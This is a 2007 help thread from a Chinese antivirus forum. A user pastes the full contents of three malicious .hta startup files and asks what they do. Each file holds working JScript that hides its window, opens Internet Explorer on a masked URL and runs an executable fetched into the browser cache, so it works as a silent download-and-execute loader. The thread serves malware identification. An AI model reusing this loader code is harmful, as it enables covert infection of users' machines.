微点交流论坛 - 反病毒 - 大家好，我新来的，我启动时出现三个.hta文件在启动项(已解决)

微点交流论坛 » 反病毒 » 大家好，我新来的，我启动时出现三个.hta文件在启动项(已解决)

ok123zyz
新手上路

积分 1
发帖 1
注册 2007-6-30

#1 大家好，我新来的，我启动时出现三个.hta文件在启动项(已解决)

我在百度搜  木马.hta  时找到这里，看到有一篇与我情况类似的。
http://bbs.micropoint.com.cn/sho ... ;page=1&fpage=1

但到最后好像没有下文！！！

我这里出现三个 microsofts.hta          windows.hta    木马.hta

我已经将这三个家伙全都改了扩展名，重启之后发现运行不了喽！

我想前边那位朋友遇到的，与我是一样的~

但不知道，这个木马的危害与防止措施如何。如果直接从启动项删除，那我还需要删除哪些关联的文件吗？

这已经是最近第二次中这个东西了。
我用记事本打开，然后把内容粘在这里，大家分析一下。
microsofts.hta 的内容
TG! 稈?蚕?  _⺋       g 噎c?胂般  ?    ?幎雖?嶖  _⺋
                   | ?等骪?  Dw= �� "       I       ?幎雖?嶖  _⺋    2 % € l o v e  ?          ��
€ ?  <html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject("wscript.shell");shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE http://****/vips.htm",0,0);function runmm(){var path=shell.SpecialFolders("MyDocuments");var china=path.substring(0,path.lastIndexOf("\\"));china+="\\Local Settings\\Temporary Internet Files\\Content.IE5\\";var sp=new ActiveXObject("shell.application");var ai=sp.NameSpace(china);for(i=0;i<ai.Items().Count;i++){var Folder=ai.Items().Item(i).path;Folder+="\\flashh[1].exe";try{shell.exec(Folder);}catch(e){};}window.close();};shell.Run("cmd.exe /c tree c:\\ /f",0,1);runmm();</script></body></html>

windows.hta的内容

TG! 稈?蚕?  _⺋       g 噎c?胂般  ?    ?幎雖?嶖  _⺋
                   | ?等骪?  Dw= �� "       I       ?幎雖?嶖  _⺋    2 ' € S U N N Y  ?          ��
€ ?  <html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject("wscript.shell");shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE http://www.******.html",0,0);function runmm(){var path=shell.SpecialFolders("MyDocuments");var savepath=path.substring(0,path.lastIndexOf("\\"));savepath+="\\Local Settings\\Temporary Internet Files\\Content.IE5\\";var sp=new ActiveXObject("shell.application");var Folders=sp.NameSpace(savepath);for(i=0;i<Folders.Items().Count;i++){var Folder=Folders.Items().Item(i).Path;Folder+="\\abc[1].exe";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run("cmd.exe /c tree c:\\ /f",0,1);runmm();</script></body></html>

木马.hta的内容
TG! 稈?蚕?  _⺋       g 噎c?胂般  ?    ?幎雖?嶖  _⺋
                   | ?等骪?  Dw= �� "       I       ?幎雖?嶖  _⺋    2 ' € S U N N Y  ?          ��
€ ?  <html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject("wscript.shell");shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE http://www.***.html",0,0);function runmm(){var path=shell.SpecialFolders("MyDocuments");var savepath=path.substring(0,path.lastIndexOf("\\"));savepath+="\\Local Settings\\Temporary Internet Files\\Content.IE5\\";var sp=new ActiveXObject("shell.application");var Folders=sp.NameSpace(savepath);for(i=0;i<Folders.Items().Count;i++){var Folder=Folders.Items().Item(i).Path;Folder+="\\abc[1].exe";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run("cmd.exe /c tree c:\\ /f",0,1);runmm();</script></body></html>

每个文件最前边，都是乱码！
大家分析吧。

[ Last edited by Legend on 2007-11-23 at 09:37 ]

※ ※ ※ 本文纯属【ok123zyz】个人意见，与【微点交流论坛】立场无关※ ※ ※

2007-6-30 09:51

Legend
超级版主

超级版主

积分 77171
发帖 70170
注册 2005-10-29

#2

楼主的问题微点已经解决，请等待升级，谢谢。

[ Last edited by Legend on 2007-6-30 at 16:28 ]

※文章所有权归【Legend】与【东方微点论坛】共同所有，转载请注明出处！※

微点官方认证新浪微博：欢迎进入微点新浪微博
微点技术支持邮箱: support@micropoint.com.cn
给Legend发短消息

2007-6-30 10:42

论坛跳转:

可打印版本 | 推荐 | 订阅 | 收藏

[ 联系我们 - 东方微点 ] 北京东方微点信息技术有限责任公司福建东方微点信息安全有限责任公司闽ICP备05030815号